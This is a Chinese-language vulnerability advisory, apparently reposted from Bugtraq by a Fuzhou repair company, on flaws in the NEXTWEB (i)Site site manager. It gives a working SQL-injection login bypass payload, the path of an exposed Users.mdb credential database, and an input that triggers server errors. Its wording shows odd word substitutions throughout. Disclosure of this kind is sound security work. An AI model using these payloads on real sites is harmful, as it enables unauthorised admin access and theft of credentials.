NEXTWEB (i)Site多个安全漏洞
影响体系:
NEXTWEB (i)Site
形貌:
--------------------------------------------------------------------------------
NEXTWEB (i)Site是一款站点管理体系。
(i)Site中存在多个安全漏洞,打击者可能利用这些漏洞获取办事器信息。
1. login.asp中的SQL注入
打击者可以经过发送特制的用户名和口令绕过认证,获取对(i)Site的管理拜访。
www.victim.com/admin/login.asp
用户名:attacker
口令:' or 'a'='a
2. 数据库处于不安全的目次中,这样下载Users.mdb文件就可能走漏管理员的用户名和口令。
www.victim.com/databases/Users.mdb
3. 无法处置惩罚意外情况和验证用户输入。以下输入可以导致几分钟的error 500。
www.victim.com/isite/page/*.asp?mu=&cmu='
<*来源:Trash-80 (dpangalos@zone-h.org)
Jim Pangalos (dpangalos@linuxmail.org)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=111764682925083&w=2
*>
发起:
--------------------------------------------------------------------------------
厂商补丁:
NEXTWEB
-------
现在厂商还没有提供补丁大概晋级程序
- 文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。
TAG:
|
评论加载中...
|
